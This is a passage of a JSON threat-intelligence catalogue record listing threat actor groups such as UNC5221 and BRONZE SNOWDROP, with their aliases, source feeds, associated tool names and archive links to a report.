"b2e48aa5-0dea-4145-a7e5-9a0f39d786d8", "created_at": "2024-01-18T02:02:34.643994Z", "updated_at": "2026-04-10T02:00:04.959645Z", "deleted_at": null, "main_name": "UNC5221", "aliases": [ "UNC5221", "UTA0178" ], "source_name": "ETDA:UNC5221", "tools": [ "BRICKSTORM", "GIFTEDVISITOR", "GLASSTOKEN", "LIGHTWIRE", "PySoxy", "THINSPOOL", "WARPWIRE", "WIREFIRE", "ZIPLINE" ], "source_id": "ETDA", "reports": null }, { "id": "6ce34ba9-7321-4caa-87be-36fa99dfe9c9", "created_at": "2024-01-12T02:00:04.33082Z", "updated_at": "2026-04-10T02:00:03.517264Z", "deleted_at": null, "main_name": "UTA0178", "aliases": [ "UNC5221", "Red Dev 61" ], "source_name": "MISPGALAXY:UTA0178", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b302cfdb-30c9-4dce-a968-d2398dda820d", "created_at": "2024-03-28T02:00:05.789775Z", "updated_at": "2026-04-10T02:00:03.611467Z", "deleted_at": null, "main_name": "UNC5174", "aliases": [ "Uteus" ], "source_name": "MISPGALAXY:UNC5174", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8bcbeb8a-111b-4ea1-a72b-5c7abd8ef132", "created_at": "2025-11-01T02:04:53.050049Z", "updated_at": "2026-04-10T02:00:03.774442Z", "deleted_at": null, "main_name": "BRONZE SNOWDROP", "aliases": [ "UNC5174 " ], "source_name": "Secureworks:BRONZE SNOWDROP", "tools": [ "Metasploit", "SNOWLIGHT", "SUPERSHELL", "Sliver", "VShell" ], "source_id": "Secureworks", "reports": null }, { "id": "1820b6d5-4c68-4c37-bd25-034fd77cf1bf", "created_at": "2026-01-17T02:00:03.195495Z", "updated_at": "2026-04-10T02:00:03.89438Z", "deleted_at": null, "main_name": "CL-STA-0048", "aliases": [ "CL STA 0048" ], "source_name": "MISPGALAXY:CL-STA-0048", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434730, "ts_updated_at": 1775792160, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6b112602db1be562da8ee50864a9da8e25889403.pdf", "text": "https://archive.orkl.eu/6b112602db1be562da8ee50864a9da8e25889403.txt", "img": "https://archive.orkl.eu/6b112602db1be562da8ee50864a9da8e25889403.jpg" } }